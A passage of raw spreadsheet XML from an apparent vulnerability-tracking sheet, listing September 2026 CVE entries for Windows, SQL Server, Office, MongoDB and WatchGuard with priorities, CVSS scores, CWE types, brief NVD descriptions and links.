elevate privileges locally.</t></is></c><c r="T1006" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t></is></c></row><row r="1007"><c r="A1007" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1007" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1007" s="5" t="inlineStr"><is><t>CVE-2026-72930</t></is></c><c r="D1007" s="5" t="n"><v>7</v></c><c r="E1007" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1007" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1007" s="5" t="inlineStr" /><c r="H1007" s="5" t="n"><v>0.003</v></c><c r="I1007" s="5" t="inlineStr" /><c r="J1007" s="5" t="inlineStr" /><c r="K1007" s="5" t="inlineStr" /><c r="L1007" s="5" t="inlineStr" /><c r="M1007" s="5" t="inlineStr" /><c r="N1007" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1007" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1007" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1007" s="5" t="inlineStr" /><c r="R1007" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1007" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t></is></c><c r="T1007" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t></is></c></row><row r="1008"><c r="A1008" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1008" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1008" s="5" t="inlineStr"><is><t>CVE-2026-72952</t></is></c><c r="D1008" s="5" t="n"><v>7</v></c><c r="E1008" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1008" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1008" s="5" t="inlineStr" /><c r="H1008" s="5" t="n"><v>0.003</v></c><c r="I1008" s="5" t="inlineStr" /><c r="J1008" s="5" t="inlineStr" /><c r="K1008" s="5" t="inlineStr" /><c r="L1008" s="5" t="inlineStr" /><c r="M1008" s="5" t="inlineStr" /><c r="N1008" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1008" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1008" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1008" s="5" t="inlineStr" /><c r="R1008" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1008" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T1008" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t></is></c></row><row r="1009"><c r="A1009" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1009" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1009" s="5" t="inlineStr"><is><t>CVE-2026-72963</t></is></c><c r="D1009" s="5" t="n"><v>7</v></c><c r="E1009" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1009" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1009" s="5" t="inlineStr" /><c r="H1009" s="5" t="n"><v>0.003</v></c><c r="I1009" s="5" t="inlineStr" /><c r="J1009" s="5" t="inlineStr" /><c r="K1009" s="5" t="inlineStr" /><c r="L1009" s="5" t="inlineStr" /><c r="M1009" s="5" t="inlineStr" /><c r="N1009" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1009" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1009" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1009" s="5" t="inlineStr" /><c r="R1009" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1009" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1009" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t></is></c></row><row r="1010"><c r="A1010" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1010" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1010" s="5" t="inlineStr"><is><t>CVE-2026-73003</t></is></c><c r="D1010" s="5" t="n"><v>7</v></c><c r="E1010" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1010" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1010" s="5" t="inlineStr" /><c r="H1010" s="5" t="n"><v>0.002</v></c><c r="I1010" s="5" t="inlineStr" /><c r="J1010" s="5" t="inlineStr" /><c r="K1010" s="5" t="inlineStr" /><c r="L1010" s="5" t="inlineStr" /><c r="M1010" s="5" t="inlineStr" /><c r="N1010" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1010" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1010" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1010" s="5" t="inlineStr" /><c r="R1010" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1010" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1010" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t></is></c></row><row r="1011"><c r="A1011" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1011" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1011" s="5" t="inlineStr"><is><t>CVE-2026-73005</t></is></c><c r="D1011" s="5" t="n"><v>7</v></c><c r="E1011" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1011" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1011" s="5" t="inlineStr" /><c r="H1011" s="5" t="n"><v>0.002</v></c><c r="I1011" s="5" t="inlineStr" /><c r="J1011" s="5" t="inlineStr" /><c r="K1011" s="5" t="inlineStr" /><c r="L1011" s="5" t="inlineStr" /><c r="M1011" s="5" t="inlineStr" /><c r="N1011" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1011" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1011" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1011" s="5" t="inlineStr" /><c r="R1011" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1011" s="5" t="inlineStr"><is><t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1011" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t></is></c></row><row r="1012"><c r="A1012" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1012" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1012" s="5" t="inlineStr"><is><t>CVE-2026-73022</t></is></c><c r="D1012" s="5" t="n"><v>7</v></c><c r="E1012" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1012" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1012" s="5" t="inlineStr" /><c r="H1012" s="5" t="n"><v>0.002</v></c><c r="I1012" s="5" t="inlineStr" /><c r="J1012" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1012"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12" s="5" t="inlineStr" /><c r="M1012" s="5" t="inlineStr" /><c r="N1012" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1012" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1012" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1012" s="5" t="inlineStr" /><c r="R1012" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1012" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1012" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t></is></c></row><row r="1013"><c r="A1013" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1013" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1013" s="5" t="inlineStr"><is><t>CVE-2026-77485</t></is></c><c r="D1013" s="5" t="n"><v>7</v></c><c r="E1013" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1013" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1013" s="5" t="inlineStr" /><c r="H1013" s="5" t="n"><v>0.002</v></c><c r="I1013" s="5" t="inlineStr" /><c r="J1013" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1013" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1013" s="5" t="inlineStr" /><c r="M1013" s="5" t="inlineStr" /><c r="N1013" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1013" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1013" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1013" s="5" t="inlineStr" /><c r="R1013" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1013" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1013" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t></is></c></row><row r="1014"><c r="A1014" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1014" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1014" s="5" t="inlineStr"><is><t>CVE-2026-77894</t></is></c><c r="D1014" s="5" t="n"><v>7</v></c><c r="E1014" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1014" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1014" s="5" t="inlineStr" /><c r="H1014" s="5" t="n"><v>0.002</v></c><c r="I1014" s="5" t="inlineStr" /><c r="J1014" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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4" s="5" t="inlineStr" /><c r="M1014" s="5" t="inlineStr" /><c r="N1014" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1014" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1014" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1014" s="5" t="inlineStr" /><c r="R1014" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1014" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1014" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t></is></c></row><row r="1015"><c r="A1015" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1015" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1015" s="5" t="inlineStr"><is><t>CVE-2026-77897</t></is></c><c r="D1015" s="5" t="n"><v>7</v></c><c r="E1015" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1015" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1015" s="5" t="inlineStr" /><c r="H1015" s="5" t="n"><v>0.003</v></c><c r="I1015" s="5" t="inlineStr" /><c r="J1015" s="5" t="inlineStr" /><c r="K1015" s="5" t="inlineStr" /><c r="L1015" s="5" t="inlineStr" /><c r="M1015" s="5" t="inlineStr" /><c r="N1015" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1015" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1015" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1015" s="5" t="inlineStr" /><c r="R1015" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1015" s="5" t="inlineStr"><is><t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1015" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t></is></c></row><row r="1016"><c r="A1016" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1016" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1016" s="5" t="inlineStr"><is><t>CVE-2026-77899</t></is></c><c r="D1016" s="5" t="n"><v>7</v></c><c r="E1016" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1016" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1016" s="5" t="inlineStr" /><c r="H1016" s="5" t="n"><v>0.002</v></c><c r="I1016" s="5" t="inlineStr" /><c r="J1016" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1016" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t></is></c><c r="L1016" s="5" t="inlineStr" /><c r="M1016" s="5" t="inlineStr" /><c r="N1016" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1016" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1016" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1016" s="5" t="inlineStr" /><c r="R1016" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1016" s="5" t="inlineStr"><is><t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1016" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t></is></c></row><row r="1017"><c r="A1017" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1017" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1017" s="5" t="inlineStr"><is><t>CVE-2026-77905</t></is></c><c r="D1017" s="5" t="n"><v>7</v></c><c r="E1017" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1017" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1017" s="5" t="inlineStr" /><c r="H1017" s="5" t="n"><v>0.002</v></c><c r="I1017" s="5" t="inlineStr" /><c r="J1017" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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7" s="5" t="inlineStr" /><c r="M1017" s="5" t="inlineStr" /><c r="N1017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1017" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1017" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1017" s="5" t="inlineStr" /><c r="R1017" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1017" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1017" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t></is></c></row><row r="1018"><c r="A1018" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1018" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1018" s="5" t="inlineStr"><is><t>CVE-2026-78457</t></is></c><c r="D1018" s="5" t="n"><v>7</v></c><c r="E1018" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1018" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1018" s="5" t="inlineStr" /><c r="H1018" s="5" t="n"><v>0.002</v></c><c r="I1018" s="5" t="inlineStr" /><c r="J1018" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1018" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1018" s="5" t="inlineStr" /><c r="M1018" s="5" t="inlineStr" /><c r="N1018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1018" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1018" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1018" s="5" t="inlineStr" /><c r="R1018" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1018" s="5" t="inlineStr"><is><t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1018" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t></is></c></row><row r="1019"><c r="A1019" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1019" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1019" s="5" t="inlineStr"><is><t>CVE-2026-78464</t></is></c><c r="D1019" s="5" t="n"><v>7</v></c><c r="E1019" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1019" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1019" s="5" t="inlineStr" /><c r="H1019" s="5" t="n"><v>0.002</v></c><c r="I1019" s="5" t="inlineStr" /><c r="J1019" s="5" t="inlineStr" /><c r="K1019" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1019" s="5" t="inlineStr" /><c r="M1019" s="5" t="inlineStr" /><c r="N1019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1019" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1019" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1019" s="5" t="inlineStr" /><c r="R1019" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1019" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T1019" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t></is></c></row><row r="1020"><c r="A1020" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1020" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1020" s="5" t="inlineStr"><is><t>CVE-2026-80093</t></is></c><c r="D1020" s="5" t="n"><v>7</v></c><c r="E1020" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1020" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1020" s="5" t="inlineStr" /><c r="H1020" s="5" t="n"><v>0.003</v></c><c r="I1020" s="5" t="inlineStr" /><c r="J1020" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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20" s="5" t="inlineStr" /><c r="M1020" s="5" t="inlineStr" /><c r="N1020" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1020" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1020" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1020" s="5" t="inlineStr" /><c r="R1020" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1020" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1020" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t></is></c></row><row r="1021"><c r="A1021" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1021" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1021" s="5" t="inlineStr"><is><t>CVE-2026-81192</t></is></c><c r="D1021" s="5" t="n"><v>7</v></c><c r="E1021" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1021" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1021" s="5" t="inlineStr" /><c r="H1021" s="5" t="n"><v>0.001</v></c><c r="I1021" s="5" t="inlineStr" /><c r="J1021" s="5" t="inlineStr" /><c r="K1021" s="5" t="inlineStr" /><c r="L1021" s="5" t="inlineStr" /><c r="M1021" s="5" t="inlineStr" /><c r="N1021" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1021" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1021" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1021" s="5" t="inlineStr" /><c r="R1021" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1021" s="5" t="inlineStr"><is><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is></c><c r="T1021" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t></is></c></row><row r="1022"><c r="A1022" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1022" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1022" s="5" t="inlineStr"><is><t>CVE-2026-81389</t></is></c><c r="D1022" s="5" t="n"><v>7</v></c><c r="E1022" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1022" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1022" s="5" t="inlineStr" /><c r="H1022" s="5" t="n"><v>0.004</v></c><c r="I1022" s="5" t="inlineStr" /><c r="J1022" s="5" t="inlineStr" /><c r="K1022" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1022" s="5" t="inlineStr" /><c r="M1022" s="5" t="inlineStr" /><c r="N1022" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1022" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1022" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1022" s="5" t="inlineStr" /><c r="R1022" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1022" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T1022" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t></is></c></row><row r="1023"><c r="A1023" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1023" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1023" s="5" t="inlineStr"><is><t>CVE-2026-82062</t></is></c><c r="D1023" s="5" t="n"><v>7</v></c><c r="E1023" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1023" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1023" s="5" t="inlineStr" /><c r="H1023" s="5" t="n"><v>0.004</v></c><c r="I1023" s="5" t="inlineStr" /><c r="J1023" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1023" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1023" s="5" t="inlineStr" /><c r="M1023" s="5" t="inlineStr" /><c r="N1023" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1023" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1023" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1023" s="5" t="inlineStr" /><c r="R1023" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1023" s="5" t="inlineStr"><is><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is></c><c r="T1023" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t></is></c></row><row r="1024"><c r="A1024" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1024" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1024" s="5" t="inlineStr"><is><t>CVE-2026-83940</t></is></c><c r="D1024" s="5" t="n"><v>7</v></c><c r="E1024" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1024" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1024" s="5" t="inlineStr" /><c r="H1024" s="5" t="n"><v>0.002</v></c><c r="I1024" s="5" t="inlineStr" /><c r="J1024" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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4" s="5" t="inlineStr" /><c r="M1024" s="5" t="inlineStr" /><c r="N1024" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1024" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1024" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1024" s="5" t="inlineStr" /><c r="R1024" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1024" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1024" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t></is></c></row><row r="1025"><c r="A1025" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1025" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1025" s="5" t="inlineStr"><is><t>CVE-2026-83999</t></is></c><c r="D1025" s="5" t="n"><v>7</v></c><c r="E1025" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1025" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1025" s="5" t="inlineStr" /><c r="H1025" s="5" t="n"><v>0.002</v></c><c r="I1025" s="5" t="inlineStr" /><c r="J1025" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1025" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1025" s="5" t="inlineStr" /><c r="M1025" s="5" t="inlineStr" /><c r="N1025" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1025" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1025" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1025" s="5" t="inlineStr" /><c r="R1025" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1025" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1025" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t></is></c></row><row r="1026"><c r="A1026" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1026" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1026" s="5" t="inlineStr"><is><t>CVE-2026-85360</t></is></c><c r="D1026" s="5" t="n"><v>7</v></c><c r="E1026" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1026" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1026" s="5" t="inlineStr" /><c r="H1026" s="5" t="n"><v>0.002</v></c><c r="I1026" s="5" t="inlineStr" /><c r="J1026" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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26" s="5" t="inlineStr" /><c r="M1026" s="5" t="inlineStr" /><c r="N1026" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1026" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1026" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1026" s="5" t="inlineStr" /><c r="R1026" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1026" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1026" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t></is></c></row><row r="1027"><c r="A1027" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1027" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1027" s="5" t="inlineStr"><is><t>CVE-2026-86135</t></is></c><c r="D1027" s="5" t="n"><v>7</v></c><c r="E1027" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1027" s="5" t="inlineStr"><is><t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t></is></c><c r="G1027" s="5" t="inlineStr" /><c r="H1027" s="5" t="n"><v>0.002</v></c><c r="I1027" s="5" t="inlineStr" /><c r="J1027" s="5" t="inlineStr" /><c r="K1027" s="5" t="inlineStr" /><c r="L1027" s="5" t="inlineStr" /><c r="M1027" s="5" t="inlineStr" /><c r="N1027" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1027" s="5" t="inlineStr" /><c r="R1027" s="5" t="inlineStr"><is><t>CWE-352, CWE-400</t></is></c><c r="S1027" s="5" t="inlineStr"><is><t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t></is></c><c r="T1027" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t></is></c></row><row r="1028"><c r="A1028" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1028" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1028" s="5" t="inlineStr"><is><t>CVE-2026-53933</t></is></c><c r="D1028" s="5" t="n"><v>6.9</v></c><c r="E1028" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1028" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1028" s="5" t="inlineStr" /><c r="H1028" s="5" t="n"><v>0.003</v></c><c r="I1028" s="5" t="inlineStr" /><c r="J1028" s="5" t="inlineStr" /><c r="K1028" s="5" t="inlineStr" /><c r="L1028" s="5" t="inlineStr" /><c r="M1028" s="5" t="inlineStr" /><c r="N1028" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1028" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1028" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1028" s="5" t="inlineStr" 